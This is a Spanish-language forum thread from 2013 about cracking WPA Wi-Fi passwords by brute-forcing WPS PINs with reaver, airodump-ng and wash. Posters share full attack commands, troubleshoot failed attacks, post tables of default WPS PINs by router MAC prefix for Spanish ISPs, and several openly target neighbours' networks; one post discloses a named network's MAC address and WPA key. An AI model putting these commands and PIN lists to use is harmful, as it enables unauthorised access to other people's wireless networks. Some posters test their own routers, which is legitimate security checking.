Y saco las redes y eleijo la que quiero hackear e provado con 3 o 4 distintas.
seguidanebte hablo otra pestaña y pongo

airodump-ng mon0 -w wps-test --beacons -channel x --bssid xx:xx:xx:xx:xx:xx y enter

y ahora tenog que comprobar que este activado el 0x02 ..
abro Wireshark open y el archivo cap y me sale lo de soucer y destination en las columnas
en soucer no me sale el sddi entero que habia escrito solo los tres ultimos pares y en destination solo me salen algunos con la opcion broadcasts cosa que deberian de salir todas ..
Bueno selecciono una de las pocas broadcast que tengo abro el IEE 802.11 wiriless LAN management frame yluego busco la opcion microsoft wps y no me aparece por ninguna lado por lo que no me permite ver si esta o no activado.

Seguidamente cierro y empiezo el modo reaver y escribo comandos:

reaver -i mon0 -b xx:xx:xx:xx:xx:xx -c X -e JAZZtel_12 -d 15 -vv

y tendria que buscarme ya la contraseña pero me tiro un error WARNING: Failed to associate with XX:XX:XX:XX:XX:XX..

e provado en distintos pcs y estos dos programas y no consigo resultados espero haber si podeis solucionarmelo gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 14 Febrero 2013, 15:59 pm
Código:
wash -i mon0

Si tiene aparecerá ahí, sino no aparece.

el WARNING: Failed to associate with XX:XX:XX:XX:XX:XX posiblemente este bloqueado.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: nola en 14 Febrero 2013, 16:52 pm
Las redes jazztel suelen tener el WPS bloqueado


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: lorzas90 en 14 Febrero 2013, 21:38 pm
me pasa en todas las redes ya sea ono jazztel vodafone ect ect


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 14 Febrero 2013, 23:20 pm
no veo el wash -i mon0


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 17 Febrero 2013, 15:46 pm
Buenas compañeros. Un amigo se ha puesto ono de 50 megas y le han dado el router cisco epc3825. Me dio la clave y los datos y me dijo que lo podia poner aqui publico (el ya ha cambiado todo los valores, la clave...) o sea que tengo su permiso, cualquier cosa me decis.
La red se llama ONO213085, la mac es E0:69:95:F6:8B:42, el canal es 6, es un router de wifi G y la clave es LPKCXHNR (por lo que veo y lo que tengo entendido, son claves de 8 digitos mayusculas, y en esta clave no hay ninguna vocal) salu2 y si tengo que quitar algo me lo decis.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 18 Febrero 2013, 16:04 pm
adrihamel: Si tienes eso datos de esa Ono haz el favor de pasar por mi post y publicarlo alli y no en esta sección   este es el linck : http://foro.elhacker.net/wireless_en_linux/patrones_de_pins_para_wpa-t379960.0.html

Y para confirmar que esos datos son verdaderos antes de que lo puebliques pasete foto de ese router donde vienen esos datos que tu dice.saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 18 Febrero 2013, 16:53 pm
Vale cuando vaya a su casa le hago una foto y os la mando salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 18 Febrero 2013, 16:56 pm
Una pregunta los routers de ono 5C:35:3B, tienen el wps activado pero... siempre estan bloqueados? siempre que miro la red pone uplocked y sale "yes" alquien ha sacado la clave de este router?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 18 Febrero 2013, 17:17 pm
adrihamel: Lo tendre en cuenta pero pasame la foto a mi por privado para confirmar eso datos que has dicho.Saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: lekaja en 18 Febrero 2013, 19:25 pm
Una pregunta los routers de ono 5C:35:3B, tienen el wps activado pero... siempre estan bloqueados? siempre que miro la red pone uplocked y sale "yes" alquien ha sacado la clave de este router?
yo he sacado 2 ONOXXXX con mac 5C:35:3B donde X son numeros y tiene 12 caracteres letra mayuscula,numeros y letra minuscula salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 18 Febrero 2013, 21:26 pm
yo he sacado 2 ONOXXXX con mac 5C:35:3B donde X son numeros y tiene 12 caracteres letra mayuscula,numeros y letra minuscula salu2
Y te salian con el wps desbloqueado? esque todas las que veo por mi zona, estan bloqueadas y cada vez que las miro para saber si alguna se ha desbloqueado, siempre salen con el "yes" que significan que estan bloqueadas. Esos routers de ono, se desbloquean alguna vez?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: elalkimista82 en 19 Febrero 2013, 02:49 am
elsevi me podrias ayudar  con una  wpa2 orange-4948 50:7E:5D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 19 Febrero 2013, 02:59 am
elalkimista82:
Citar
elsevi me podrias ayudar  con una  wpa2 orange-4948 50:7E:5D

si me especificas el problema te podre ayudar en lo que pueda dime


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 19 Febrero 2013, 09:55 am
elsevi me podrias ayudar  con una  wpa2 orange-4948 50:7E:5D

507E5D = 4255XXXX


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: elalkimista82 en 19 Febrero 2013, 15:13 pm
querria sacar la clave de ese rooter, tengo wifislax 3.4 y no estoy muy puesto en el tema , te lo agradeceria


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 19 Febrero 2013, 16:27 pm
elalkimista82: Descargate esta version mejor del wifislax y mira el video asin aprendes a utilizarlo y te ahorra preguntar algunas cosas facil de aprender.


3Qv7KVc8afM




p8Xdadr57eA


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: zopillo en 20 Febrero 2013, 11:13 am
Hola compañeros.

Inicié un ataque por reaver-wifislax 1.4. En una base de dato de pines obtuve los cuatro primeros dígitos. El reaver empezó pues, a partir del 50%. Al cabo de 8 horas, llegó al 100% pero no dió la clave... seguía y seguía quedándose en el 100%.
Por qué debe ser? Pq los primeros cuatro que le dí no eran buenos??

Un par de días antes, había probado en el router de mi casa, y también le dí los 4 primeros dígitos (super seguros pq entré primero en mi propio router), y también empecé desde 50%, y al llegar al final, sí me dió mi clave.

Ahora he lanzado otro ataque si darle ningún pin, a ver que tal... pero claro, durará y durará y durará, tiempo. Eso contando con que no se bloquee antes...

Cuál es vuestra opinión?? Muchas gracias!!!!!!!!!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: SINSEMILLA en 21 Febrero 2013, 16:10 pm
hola tengo el wiifiway 3.4 , y tengo el mac y el handshake cacturado un vodafone
y e ,estado toda la noche, provando diccionarios y nada me podrian, ayudar
en donde esta el reaver en wifiway, o me podrian pasar un buen tutorial, o algo que me funciones gracias


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mbalakh en 22 Febrero 2013, 13:23 pm
Hola buenas, he estado leyendo sobre los problema que habéis tenido con las wlan_xxxx con macs D0:AE:EC:XX:XX:XX ... que no os podía dar la clave, etc ...
Yo he coseguido conseguir el pin 77485625 y una clave de 20 caracteres.

El problema es que no consigue conectar, he intentado clonando la mac del cliente desde varios sistemas operativos y nada ... error de autentificación.
Un dato más es que la red está relativamente cerca (con esas distancias otras redes daban en reaver entre 3-5 seconds/pin) en esta subía hasta 13-16 seconds/pin. Todo esto con backtrack 5R2

@Elsevi he visto en otros mensajes que lo intentabas y no podías, pudiste solucionar algo ? perdona por preguntar pero el hilo de esa red está muy perdida entre tanto mensaje.

Alguien sabe exactamente cuál es el problema ???
Gracias de antemano.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 22 Febrero 2013, 15:58 pm
mbalakh: Hola buenas te importaria decirme si esa WLAN_XXXX CON MAC D0:AE:EC:XX:XX:XX Es tuya o es del vecino y consiste sacarla con ese pin y no te puedes conectar a esa red no lo entiendo la verdad deberia conectarte si has sacado la clave bien no deberias tener problema yo demomento no he sacado nada con esa mac e intentado varios pines y nada demomento no he sacado nada si no te importa pasame los datos complento de esta red por privados por fa me gustaria comprar la clave por defecto de esta red con una que yo tengo haber si puedo sacar un algoritmo me vendria perfecto si kieres ayudarme contestame por privado. ;)


Quien tengas datos de esta WLAN_XXXX CON MAC D0:AE:EC:XX:XX:XX que me lo pases a mi por privados quiero compararla con otra wlan_xxxx que yo tengo que empieza igual que esta quiero intentar sacar un algoritmo y por favor que me pase el pin completo.Gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mbalakh en 22 Febrero 2013, 16:20 pm
Como ya le he puesto a elsevi por privado, al final era un error de transcripción de la wpa key, el cuál confundí una Ó con un 0.

Es decir, los datos que he puesto son válidos y funcionan por lo menos para esa mac con esa essid. Es un homestation de telefónica.

Un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 22 Febrero 2013, 16:40 pm
Eso suele pasar  lo de confundirte la O con el 0 siempre son ceros en esta wlan_xxxx son nuevas de hace mas de un mes, te pondre estos datos en mi es post donde esta todas la redes. Gracias por compartir. :D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: statequieta en 23 Febrero 2013, 13:53 pm
Se sabe si las Vodafone ya van cayendo? Hace cosa de 2 meses que no me paso y por entonces estaba jodido... Igual con las Tele2, ¿alguna noticia?=

Saludos y gracias!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: SINSEMILLA en 23 Febrero 2013, 18:03 pm
Hola me podeis ayudar conmi red
me sale este error con el reaver
utiliso este comando

reaver -i mon0 -b 00:00:00:00:00:00  -c 6 -e potas312J

  • 0.35% complete @ 2013-02-23 01:13:26 (10 seconds/attempt)
  • 0.39% complete @ 2013-02-23 01:14:13 (10 seconds/attempt)
  • [!] WARNING: Failed to associate with 00:00:00:00:00:00 (ESSID: potas312J)
  • 0.44% complete @ 2013-02-23 01:15:35 (11 seconds/attempt)
  • 0.48% complete @ 2013-02-23 01:16:28 (11 seconds/attempt)
  • 0.53% complete @ 2013-02-23 01:17:24 (11 seconds/attempt)
  • [!] WARNING: Failed to associate with 00:00:00:00:00:00 (ESSID: potas312J)
  • 0.57% complete @ 2013-02-23 01:18:25 (11 seconds/attempt)
  • 0.62% complete @ 2013-02-23 01:19:11 (11 seconds/attempt)

aque se debe este error utiliso wifiway, 3.4 bueno la ultima
gracias   :huh:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: popeye7 en 23 Febrero 2013, 18:54 pm
utiliza
reaver -i mon0 -b 00:00:00:00:00:00  -c 6 -e potas312J -vv y veras mas informacion , para mi el reaver te esta funcionando bien , es muy usual que de ese tipo de fallos , mira si te da M1,M2,M3;M4  y si da M5 ,M6 tienes los 4 primeros pin correctos
.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: SINSEMILLA en 23 Febrero 2013, 19:18 pm
yo lo ago asi
tambien
reaver -i mon0 -b 00:00:00:00:00:00  -c 6 -e potas312J -vv 15
y me da error  pero como tu no lo echo despues lo intento y te digo
y me da m6 creo

pero no veas el tiempo, estuvo toda la noche y al 35 porciento namas
otra cosa que eso de los pin correcto ?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: popeye7 en 23 Febrero 2013, 20:26 pm
Pues como la mac sea  8C:0C:A3:XX:XX:XX , te queda otro rato


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: SINSEMILLA en 23 Febrero 2013, 20:31 pm
utiliza
reaver -i mon0 -b 00:00:00:00:00:00  -c 6 -e potas312J -vv y veras mas informacion , para mi el reaver te esta funcionando bien , es muy usual que de ese tipo de fallos , mira si te da M1,M2,M3;M4  y si da M5 ,M6 tienes los 4 primeros pin correctos
.

aciendolo como tu dices  
reaver -i mon0 -b 00:00:00:00:00:00  -c 6 -e potas312J -vv
me da este error también[!] WARNING: Failed to associate with 00:00:00:00:00:00 (ESSID:potas312 )
y al final sin llegar a terminar claro
mesale esto

[!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the   pin yet!
pero como se para,
 no se


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: popeye7 en 23 Febrero 2013, 22:02 pm
No se que reaver tienes , ni que adaptador . podrias probar con inflator 1.0  y ver si te da el mismo error. Podrias probar con otra red y ver si te ocurre lo mismo .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 24 Febrero 2013, 01:04 am
SINSEMILLA: Tambien puede ser por que la señal esta lejos y por eso no se asocia bien acercate mas o utiliza una antena buena. ;)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: SINSEMILLA en 24 Febrero 2013, 12:26 pm
no cojo mala, cojo 4 rallas no esta mal no,
y que comando se utilisa para el inflator


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: SINSEMILLA en 24 Febrero 2013, 18:18 pm
Hola
utiliso el VMware Workstation 9
y no se me pone en modo  monitor
esto es lo que ago

wifislax ~ # airmon-ng start wlan0

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
3212    dhcca


Interface       Chipset         Drive


2 paso sale esto
wifislax ~ # airodump-ng mon0

Interface mon0:
ioctl(SIOCGIFINDEX) failed: No such device

3 paso
wifislax ~ # reaver-1,3 -i mon0 -b 00:00:00:00:00:00 -vv

wifislax ~ # reaver -i mon0 -b 00:00:00:00:00:00 -c 6 -e potaje342 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

  • Switching mon0 to channel 6
  • [-] Failed to retrieve a MAC address for interface 'mon0'!

    no se que ago mal


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 24 Febrero 2013, 18:35 pm
Tenes que habilitar el dispositivo inalambrico y ver si soporta el driver.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: SINSEMILLA en 24 Febrero 2013, 19:12 pm
Tenes que habilitar el dispositivo inalambrico y ver si soporta el driver.

hola yo tengo la versión 9 del VMware Workstation y no se en donde esta
me puedes ayudar


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: popeye7 en 24 Febrero 2013, 22:55 pm
En vmware solo funcionan los adaptadores usb , si quieres que aparezca tu dispositivo wifi ,tendrás que utilizar wifslax o cualquer distro de auditorias en livecd,liveusb o en disco duro ,ese es el problema que tienes.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: valdomero en 25 Febrero 2013, 10:13 am
 he sacado 2 claves WPA con reaver que llevan numeros y letras mayusculas y minusculas ( 20 caracteres ) y no consigo que me de IP. ¿hay alguna forma de pasar esa contraseña a ASCII o a Hexadecimal para ponerla en el router?? Saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: popeye7 en 25 Febrero 2013, 11:33 am
http://hwagm.elhacker.net/php/sneak.php


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: valdomero en 25 Febrero 2013, 13:08 pm
Gracias Popeye. El problema es que no se esa contraseña en que esta , ya que no es hex ni ascii


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 27 Febrero 2013, 12:19 pm
En vmware solo funcionan los adaptadores usb , si quieres que aparezca tu dispositivo wifi ,tendrás que utilizar wifslax o cualquer distro de auditorias en livecd,liveusb o en disco duro ,ese es el problema que tienes.

 cuando vayas a arrancar la máquina virtual,con la antena usb conectada...en las conexiones habilitas la red en modo bridge y usará la antena que tengas....sea usb o eth
salud


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 27 Febrero 2013, 12:22 pm
Se sabe si las Vodafone ya van cayendo? Hace cosa de 2 meses que no me paso y por entonces estaba jodido... Igual con las Tele2, ¿alguna noticia?=

Saludos y gracias!


van cayendo....van cayendo....una detrás de otra  :silbar:


(http://i1156.photobucket.com/albums/p567/bassllekano/SOFTWARE/vodafone.png)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Pablo Videla en 28 Febrero 2013, 15:52 pm
Ayer hice la prueba con mi router y efectivamente era vulnerable, hace poco me cambiaron el router y viene con WPS activado, y claro 9200 segundos despues salto mi clave wpa2-psk.

Asi que ahora a buscar la forma de entrar a mi router ya que estos tarados no me dieron la clave del panel de control.

Se agradece la info, hace tiempo que vengo leyendo todo esto pero recien ayer me puse a probar  :xD


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: zeba en 10 Marzo 2013, 05:33 am
hola me llevo leyendo como 10 paginas ya y no encuentro la solucion en este post alguien seria tan amable de decirme porque me dice esto al pasar el comand de reaver?

WARNING: Failed to associate with XX:XX:XX:XX:XX (ESSID: xxxxxxxx)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 11 Marzo 2013, 01:39 am
Gracias Popeye. El problema es que no se esa contraseña en que esta , ya que no es hex ni ascii

ojo porque hay veces que te lanza un hash, trata de pasarlo varias veces ya que tienes el pin con la v1.4 y la v1.3 haber si te lo convierte.

hola me llevo leyendo como 10 paginas ya y no encuentro la solucion en este post alguien seria tan amable de decirme porque me dice esto al pasar el comand de reaver?

WARNING: Failed to associate with XX:XX:XX:XX:XX (ESSID: xxxxxxxx)

Falta de señal, el AP esta bloqueado, se pierde la conexión o el tiempo de la misma es muy largo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: valdomero en 11 Marzo 2013, 09:56 am
Voy a probar a ver si me la convierte siguiendo tus consejos. El caso es que en linux y en el movil si que funciona , pero en mi router de sobremesa con xp y en el portatil con windows 7 no hay manera
Saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jemez44 en 20 Marzo 2013, 12:33 pm
Estoy empezando a leerme los 1.000 mensajes del hilo uno por uno.

Que no se ofenda el creador de este hilo, pero es un caos.
En la primera página echo de menos:
*Lista de las tarjetas que son compatibles.
*Lista de errores y soluciones. (si te sale "error 2001, es porque estás demasiado lejos del router", es un ejemplo inventado).

Hay que currarse un poco más los hilos chinchetas.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 22 Marzo 2013, 02:16 am
jemez44: La lista de tarjetas son las que pones CHIPSETS SOPORTADOS:

Atheros AR2425 (ath5k)
Atheros AR5212
Atheros AR5213A
Atheros AR542x
Atheros AR9271 (Perfecto)
rtl8187L
rtl8187B
rtl8188ru
rtl8192cu
carl19170
ipw2000
rt2800pci
Intel 3945ABG
Intel 5100
iwl3954
iwl4965
zd1211rw

Esto quiere decir las que si son compatibles aora si ha añadido algunas nuevas no lo se por que ejemplo mi Atheros creo que no esta hay y si es compatible con programas como wifislax, wifiway aora con bactrack no lo se.

Que hay cosas en este hilo que no tiene nada que ver con lo que has leeido hay si te doy la razón por que algunas surgen algunas dudas que no tiene nada que ver con el tema del que se estabamos hablando como en este tema ha pasado en otros mas pero no es dificil de evitar se podria evitar ? Creo que si nos leemos bien el contenido del tema. ;)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: robeiniesta90 en 22 Marzo 2013, 13:39 pm
Buenas a todos,

No entiendo por que en una vodafone 28:5f:db:XX:XX:XX co nel router a 3 metros, señal por tanto explendida, al usar el reaver repite siemrpe el mismo pin, he intentado con el 1.3 y 1.4, con el wifislax y otros... siemrpe igual... y lo raroes que hace tiempo si cambiaba...

es q se habrá protegido? probé con otra antena por si se habia bloqueado mi MAC y seguía igual, uso una antena usb alfa rtl8187.

saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: 1jabato1 en 22 Marzo 2013, 21:30 pm
Buenas noches:
Mi router se queda en 99% con reaver, se puede suponer que los cuatro primeros números fijos son del pin?.
Perdonad mi ignorancia, un saludo y gracias de antemano


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 23 Marzo 2013, 00:06 am
1jabato1: Que router tienes? El reaver fue diseñado para sacar claves WPS que cumplan con la regla de 7+checksum, es decir, si la clave es 01234567, los siete primeros son la clave y el octavo se genera a partir de calculos realizados con los otros siete. Que quiere decir esto? Que cualquier valor no sirve (en teoría) como clave. De hecho si se usa el comando -p XXXXXXXX y se pone un pin de 8 dígitos, probablemente veremos como nos cambia el último dígito.

Pues bien, que ocurre si los routers permiten poner cualquier clave WPS de 8 dígitos, aunque no se respete el checksum? Pues que te encontraras con que el reaver no encontrará jamás la segunda parte de la clave y tendrás el problema del 99,99%.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: 1jabato1 en 23 Marzo 2013, 01:14 am
Gracias por responder.
El router es Amper y la clave es de ocho dígitos, ahora lo entiendo.
Un saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: starskiller en 24 Marzo 2013, 20:08 pm
REALIZADO



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 24 Marzo 2013, 20:29 pm
Mi red es una WLAN_XXXX,y no tiene el WPS habilitado.


Va probando por el Pin 00385670

y si no tiene porque los prueba? y no te lleva a error directamente.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: starskiller en 24 Marzo 2013, 20:30 pm
REALIZADO


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 25 Marzo 2013, 05:55 am
starskiller: Eso mismo te iba  a preguntar como vas a lanzar un ataque si no tienes el WPS Habilitado ?  :laugh:

Oye te importaría pasarme esos datos de tu router de esa WLAN_XXXX por privado y asín poder confirmar esos datos y pode ponerlo en mi post de Patrones de PINs para WPA.saludo. ;)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 25 Marzo 2013, 17:44 pm
Buenas, los router de movistar fusion de telefonica con mac A4:52:6F son compatibles con el wps. Me ha sacado pin y clave desde 0,0 en 86 segundos salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 27 Marzo 2013, 12:42 pm
Vamos vamos vamos los roters de vodafone van cayendo jajaja el pin lo he sacado por el "PINwps'GUI v2" (nose si pued poner esto aqui ya que es de otro foro pero sino cambio el comentario) pues eso he puesto la mac, el nombre y me da un solo pin lo que puesto con un programa que me venia con la tarjeta y zas! a la primera sin necesidad de reaver ni nada. La red es vodafoneXXXX con mac 72:53:D4, el pin no le doy ya que con el programa se saca el pin y todo y la cave son letras mayusculas son 14 y lo que me sorprende esque lleva 1 numero salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 29 Marzo 2013, 04:32 am
C8:64:C7 (Inviolable)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maik78 en 31 Marzo 2013, 03:05 am
Buenas....
estoy a punto de desistir, no puedo auditar una Onoxxxx con mac A0:21:B7, lo último que me pasa es que coloque el pin que coloque se me pone al 90% y me avanza lentamente, probando siempre el pin que le pongo.

El comando q uso es reaver -i mon0 -b A0:21:B7:XXXXXX -p XXXXXXXX -vv con un chipset atheros

Cual puede ser el problema??


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 31 Marzo 2013, 03:22 am
Buenas....
estoy a punto de desistir, no puedo auditar una Onoxxxx con mac A0:21:B7, lo último que me pasa es que coloque el pin que coloque se me pone al 90% y me avanza lentamente, probando siempre el pin que le pongo.

El comando q uso es reaver -i mon0 -b A0:21:B7:XXXXXX -p XXXXXXXX -vv con un chipset atheros

Cual puede ser el problema??

Si pones el pin completo y te salta a 90% no esta bien el pin, sino que tienes los primeros 4 seguros.. cambia el ataque y pon solo los primeros 4.. ya que es una red muy crackeable:

Código:
MAC Address WPS PIN
========================
A021B7 41252147
A021B7 39149138
A021B7 5400XXXX
A021B7 80324560
A021B7 81121496
a021b7 47624313
A021B7 11352464
a021b7 22813503
A021B7 82581507
A021B7 25815078
a021b7 33440279
A021B7 86559256
A021B7 43454044
A021B7 8067XXXX
A021B7 43135479
A021B7 51920104
A021B7 15880208
A021B7 53134424
A021B7 72218013
A021B7 01874341
A021B7 8990XXXX
A021B7 2734XXXX
A021B7 1441XXXX
A021B7 71202358
========================
by WPSdb.site40.net


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 31 Marzo 2013, 06:03 am
Citar
Estos son los peores:

Código:
MAC Address   WPS PIN      MODELO
===========================================
C8D719      20675912   Cisco X1000
98FC11      99756666   Cisco X3000
04C06F      35404187   Huawei E5832 (Orange/España)
===========================================
by WPSdb.site40.net

P4nd3m0n1um: Que quieres decir que con estos son los peores no hay forma de sacarlos con ninguno de esos pin que están hay ? Yo se que los router Huawei algunas Son las FTE y son imposibles de sacar se bloquea el router también.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 31 Marzo 2013, 09:25 am
P4nd3m0n1um: Que quieres decir que con estos son los peores no hay forma de sacarlos con ninguno de esos pin que están hay ? Yo se que los router Huawei algunas Son las FTE y son imposibles de sacar se bloquea el router también.

como que a que me refiero? jajaj  :xD

el Modo Dios lo tiene el C8:64:C7, nadie ha crackeado ninguna.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maik78 en 31 Marzo 2013, 17:41 pm
Gracias, he probado con los estos  números  4125 y 3914... Los dos me los pone a 90%
Cómo os lo explicais? Como se cual es el correcto??
Comando q utilizo es reaver -i mon0 -b A0:21B7:XX:XX:XX -p 4125


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 31 Marzo 2013, 19:57 pm
Gracias, he probado con los estos  números  4125 y 3914... Los dos me los pone a 90%
Cómo os lo explicais? Como se cual es el correcto??
Comando q utilizo es reaver -i mon0 -b A0:21B7:XX:XX:XX -p 4125

y uno pueda que sea el WPS Pin y el otro el WPS PBC  :xD


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 1 Abril 2013, 16:24 pm
Habeis conseguido descifrar las redes de VodafoneXXXX con mac 00:24:D2? tienen el wps activado pero al atacarlo por el reaver, no avanza el pin. Alguna sugerencia? Son las vodafone antiguas ya que son de tipo:802.11g salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maik78 en 1 Abril 2013, 16:59 pm
Muy agudo...  El caso es que no avanzo con está ONOXXXX.... tengo una AR9271usb, aparte de la que viene en el portátil q es una broadcom 4313.

El chipsep AR9271 es compatible no debería tener, en principio, ningún problema no?

Por otra parte, las redes q he podido auditar,lo he hecho con la broadcom y con el programa WPSPinGenerator, esto quiere decir que este chipset sí es compatible con reaver?

Esto parece sencillo un par de comandos y voilà!!!! Tenemos clave, pero es más complicado...

Saludos



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Bl4ck3lf en 1 Abril 2013, 17:09 pm
No se si será una pregunta estúpida la que te voy a hacer pero, ¿has probado a esperar a que te saque el pin completo?, es decir, sin necesidad de poner los cuatro primeros o todo el pin.

El comando sería: reaver -i mon0 -b A0:21:B7:XXXXXX -vv

Saludos!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maik78 en 1 Abril 2013, 17:20 pm
Si q lo he hecho... unas 24 horas más o menos... y desespera. En principio para intentar ahorrarme  ese tiempo lo que hago es colocar los pin por defecto que trae esa mac... pero sin ningún resultado.

Habrá que probar el comando sin pin y a ver como evoluciona el %.

Saludos.




Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: 4NTR4X13 en 1 Abril 2013, 23:13 pm
Prueba con esto y ya me diras:

reaver -i mon0 -b (bssid) -c (canal)-a-v-s-x10-r100:10-l60 -c

 Ten paciencia este tipo de auditoria dura entre 2 y 24 horas aproximadamente, pero te aseguro que si sigues los comandos al pie de la letra, la sacas fijo. ;D



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 1 Abril 2013, 23:21 pm
Muy agudo...  El caso es que no avanzo con está ONOXXXX.... tengo una AR9271usb, aparte de la que viene en el portátil q es una broadcom 4313.

El chipsep AR9271 es compatible no debería tener, en principio, ningún problema no?

Es la que mejor anda la Atheros AR9271, la Broadcom no te funcionara va hay muy pocas compatibles y depende mucho del driver.

Prueba con esto y ya me diras:

reaver -i mon0 -b (bssid) -c (canal)-a-v-s-x10-r100:10-l60 -c

 Ten paciencia este tipo de auditoria dura entre 2 y 24 horas aproximadamente, pero te aseguro que si sigues los comandos al pie de la letra, la sacas fijo. ;D


Explica tu bicho.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: 4NTR4X13 en 1 Abril 2013, 23:30 pm
Mi bicho????

ALFA
AWUS036NH



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: shinichi999 en 2 Abril 2013, 16:05 pm
Una consulta. Probé con el siguiente comando:

reaver –i mon0 –b (BSSID) -c (canal) -vv

A pesar de darme error 0x02 y 0x03 (WPS Transaction Failed) el porcentaje siguió aumentando y al cabo de unas 8 horas el PIN ya estaba en 99%.....

